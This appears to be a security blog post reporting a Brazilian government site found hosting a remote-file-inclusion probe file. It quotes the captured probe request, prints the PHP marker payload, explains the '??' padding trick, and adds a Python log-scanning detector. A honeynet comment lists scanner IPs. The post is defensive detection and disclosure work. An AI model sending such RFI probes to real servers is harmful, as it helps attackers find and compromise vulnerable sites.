Brazilian government site hacked

Today our honeypot detected one more .gov site hacked (among the thousands we see daily). This time from the Brazilian government. The site in question is http://www.sefaz.mt.gov.br.

We started to see RFI requests trying to make vulnerable scripts include a file placed inside their “portal” directory (the trailing ?? turns whatever the targeted script appends to the parameter into a query string, so the remote file is fetched unchanged):

a.185.231.103 - - - 
"GET /bbs//write.php?dir=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 36 "-" "Mozilla/5.0"

Fetching the file shows, once again, the signature of the well-known RFI bot scanner (the Fx29ID / FeeLCoMz marker it echoes so the scanner can tell from the response that the inclusion worked):

$ lynx --source --dump http://www.sefaz.mt.gov.br/portal/tes.txt
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
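To show how the two artifacts above fit together, here is an added example (not code from the original post) that picks RFI probes like the one captured out of an access log and recognises the marker file they point at. The log lines are constructed in Apache combined format from what the post shows (the timestamp and the first octet of the scanner address are taken from the honeynet comment below; the benign line and the percent-encoded probe are made up), and the marker check collapses the "FeeL"."CoMz" concatenation so it matches both the raw source lynx returned and the FeeLCoMz string a vulnerable script would print after including it.

```python
"""Pick remote file inclusion (RFI) probes out of an access log and recognise
the FeeLCoMz/Fx29ID marker file that the probes point at.

Added example; not code from the original post. The log lines and the
executed-output sample below are constructed from what the post shows.
"""
import re
from collections import Counter
from dataclasses import dataclass
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access log (Apache combined format). The first entry
# reproduces the request captured in the post, with the timestamp and first
# octet of the source address taken from the honeynet comment; the other two
# are made up: one benign request and one probe with a percent-encoded URL.
SAMPLE_LOG = """\
89.185.231.103 - - [08/Apr/2010:16:58:24 +0000] "GET /bbs//write.php?dir=http://www.sefaz.mt.gov.br/portal/tes.txt?? HTTP/1.1" 404 36 "-" "Mozilla/5.0"
198.51.100.23 - - [08/Apr/2010:16:59:10 +0000] "GET /index.php?page=contact HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
89.185.231.103 - - [08/Apr/2010:17:14:38 +0000] "GET /wp-content/themes/x/index.php?inc=http%3A%2F%2F203.0.113.9%2Ftes.txt%3F HTTP/1.1" 404 36 "-" "libwww-perl/5.805"
"""

# Raw source of the marker file as the post fetched it with lynx, and the
# output a vulnerable script would produce after including it (constructed).
MARKER_FILE_SOURCE = '<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>'
EXECUTED_OUTPUT = "FeeLCoMz"

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# The marker is written as "FeeL"."CoMz" in the source so that a grep for the
# joined string on disk misses it; strip PHP string concatenation first.
CONCAT_RE = re.compile(r'"\s*\.\s*"')
MARKER_RE = re.compile(r'FeeLCoMz|Fx29ID')


@dataclass
class RfiProbe:
    src: str           # scanner address
    timestamp: str
    script: str        # script the scanner hopes is vulnerable
    param: str         # parameter fed a remote URL
    include_url: str   # URL the script is asked to include
    include_host: str  # host serving the marker file (the hacked site)
    padded: bool       # trailing '?' turns any appended suffix into a query string
    status: int


def find_rfi_probes(log_text: str) -> list[RfiProbe]:
    """Return one RfiProbe per query parameter whose value is a remote URL."""
    probes = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m["target"])
        # parse_qsl percent-decodes values, so an encoded http%3A%2F%2F is caught too
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if not REMOTE_URL_RE.match(value):
                continue
            probes.append(RfiProbe(
                src=m["src"], timestamp=m["ts"], script=target.path, param=name,
                include_url=value, include_host=urlsplit(value).hostname or "",
                padded=value.endswith("?"), status=int(m["status"]),
            ))
    return probes


def contains_probe_marker(text: str) -> bool:
    """True for the marker file's source and for a page that executed it."""
    return bool(MARKER_RE.search(CONCAT_RE.sub("", text)))


def probe_sources(probes: list[RfiProbe]) -> Counter:
    """Count events per scanner address, like the honeynet comment's SIP totals."""
    return Counter(p.src for p in probes)


def hosting_sites(probes: list[RfiProbe]) -> set[str]:
    """Hosts serving marker files: these are the compromised sites to notify."""
    return {p.include_host for p in probes}


if __name__ == "__main__":
    found = find_rfi_probes(SAMPLE_LOG)
    for p in found:
        print(f"{p.timestamp} {p.src} -> {p.script}?{p.param}= {p.include_url} "
              f"(padded={p.padded}, status={p.status})")
    print("scanner sources:", dict(probe_sources(found)))
    print("sites hosting marker files:", sorted(hosting_sites(found)))
    print("lynx output is the marker file:", contains_probe_marker(MARKER_FILE_SOURCE))
    print("executed output is the marker:", contains_probe_marker(EXECUTED_OUTPUT))
```

The 404 on the captured request only means the honeypot had no /bbs/write.php; on a real target, the scanner decides the script is exploitable when the response body contains FeeLCoMz, which is what contains_probe_marker checks for on the executed output. hosting_sites is the list to act on: every host in it is serving an attacker-planted file and is worth a notification like the one this post is asking for.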

Anyone with contacts at mt.gov.br? Let them know about it. We only detected this one file, but if the attackers were able to write it there, they have probably added (or will add) a bunch more.

2 comments
  1. Hi guys,

    Confirmed through our honey net.

    RFI IP : 201.49.164.104
    RFI FQDN : 201.49.164.104
    RFI Country : – Brazil
    RFI City : N/A

    RFI ID : 4506
    RFI Domain : http://www.sefaz.mt.gov.br
    RFI Domain IP : 200.241.32.194
    RFI URL : http://www.sefaz.mt.gov.br/portal/tes.txt??

    RFI number of events : 2
    RFI total SRC IP : 1
    RFI first seen : 2010-04-08 16:58:24
    RFI last seen : 2010-04-08 17:14:38
    RFI livetime : 0 day('s)

    Source(s) requesting this RFI :

    SIP :89.185.231.103
    Numbers of events generated by this SIP : 150
    SIP first seen : 2009-07-24 03:34:41
    SIP last seen : 2010-04-08 17:14:38
    SIP also hosting RFI exploit : YES

    Events activities from this SIP : http://twitpic.com/1e3vup
    SIP as RFI details : http://twitpic.com/1e3w2x
